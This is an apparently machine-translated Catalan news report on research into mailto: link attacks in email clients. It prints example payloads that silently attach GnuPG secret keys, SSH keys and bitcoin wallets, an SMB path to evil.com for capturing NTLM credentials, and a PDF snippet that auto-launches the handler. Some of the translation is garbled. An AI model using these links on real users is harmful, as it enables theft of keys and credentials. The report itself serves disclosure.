Investigadors de la Universitat del Ruhr de Bochum (Alemanya) () comportament dels clients de correu quan es processen enllaços “mailto:” amb paràmetres avançats. Cinc dels vint clients de correu electrònic examinats eren vulnerables a un atac que manipulava la substitució de recursos mitjançant el paràmetre "adjuntar". Sis clients de correu electrònic addicionals eren vulnerables a un atac de substitució de claus PGP i S/MIME, i tres clients eren vulnerables a un atac per extreure el contingut dels missatges xifrats.
Enllaços «"s'utilitzen per automatitzar l'obertura d'un client de correu electrònic per escriure una carta al destinatari especificat a l'enllaç. A més de l'adreça, podeu especificar paràmetres addicionals com a part de l'enllaç, com ara l'assumpte de la carta i una plantilla per al contingut típic. L'atac proposat manipula el paràmetre "adjuntar", que permet adjuntar un fitxer adjunt al missatge generat.
Els clients de correu Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) i Pegasus Mail eren vulnerables a un atac trivial que us permet adjuntar automàticament qualsevol fitxer local, especificat mitjançant un enllaç com "mailto:?attach=path_to_file". El fitxer s'adjunta sense mostrar cap avís, per la qual cosa, sense una atenció especial, l'usuari pot no notar que la carta s'enviarà amb un fitxer adjunt.
Per exemple, utilitzant un enllaç com "mailto:[protegit per correu electrònic]&subject=Títol&body=Text&attach=~/.gnupg/secring.gpg" podeu inserir claus privades de GnuPG a la carta. També podeu enviar el contingut de carteres cripto (~/.bitcoin/wallet.dat), claus SSH (~/.ssh/id_rsa) i qualsevol fitxer accessible per l'usuari. A més, Thunderbird us permet adjuntar grups de fitxers per màscara mitjançant construccions com "attach=/tmp/*.txt".
A més dels fitxers locals, alguns clients de correu electrònic processen enllaços a l'emmagatzematge de xarxa i camins al servidor IMAP. En particular, IBM Notes us permet transferir un fitxer des d'un directori de xarxa quan processeu enllaços com "attach=\\evil.com\dummyfile", així com interceptar paràmetres d'autenticació NTLM enviant un enllaç a un servidor SMB controlat per l'atacant. (la sol·licitud s'enviarà amb l'usuari actual dels paràmetres d'autenticació).
Thunderbird processa correctament peticions com "attach=imap:///fetch>UID>/INBOX>1/", que us permeten adjuntar contingut de carpetes del servidor IMAP. Al mateix temps, els missatges recuperats d'IMAP, xifrats mitjançant OpenPGP i S/MIME, són desxifrats automàticament pel client de correu abans d'enviar-los. Els desenvolupadors de Thunderbird van ser sobre el problema al febrer i al número el problema ja s'ha solucionat (les branques 52, 60 i 68 de Thunderbird continuen sent vulnerables).
Les versions antigues de Thunderbird també eren vulnerables a altres dues variants d'atac a PGP i S/MIME proposades pels investigadors. En concret, Thunderbird, així com OutLook, PostBox, eM Client, MailMate i R2Mail2, van ser objecte d'un atac de reemplaçament de claus, causat pel fet que el client de correu importa i instal·la automàticament nous certificats transmesos en missatges S/MIME, cosa que permet l'atacant per organitzar la substitució de claus públiques ja emmagatzemades per l'usuari.
El segon atac, al qual són susceptibles Thunderbird, PostBox i MailMate, manipula les característiques del mecanisme d'emmagatzematge automàtic dels esborranys i permet, mitjançant paràmetres de mailto, iniciar el desxifrat de missatges xifrats o l'addició d'una signatura digital per a missatges arbitraris, amb transmissió posterior del resultat al servidor IMAP de l'atacant. En aquest atac, el text xifrat es transmet a través del paràmetre "body" i l'etiqueta "meta refresh" s'utilitza per iniciar una trucada al servidor IMAP de l'atacant. Per exemple: ' '
Per processar automàticament els enllaços "mailto:" sense la interacció de l'usuari, es poden utilitzar documents PDF dissenyats especialment: l'acció OpenAction en PDF us permet iniciar automàticament el gestor de mailto quan obriu un document:
%PDF-1.5
1 obj
<< /Tipus /Catàleg /OpenAction [2 0 R] >>
endobj
2 obj
<< /Type /Action /S /URI/URI (mailto:?body=——BEGIN PGP MESSAGE——[…])>>
endobj
Font: opennet.ru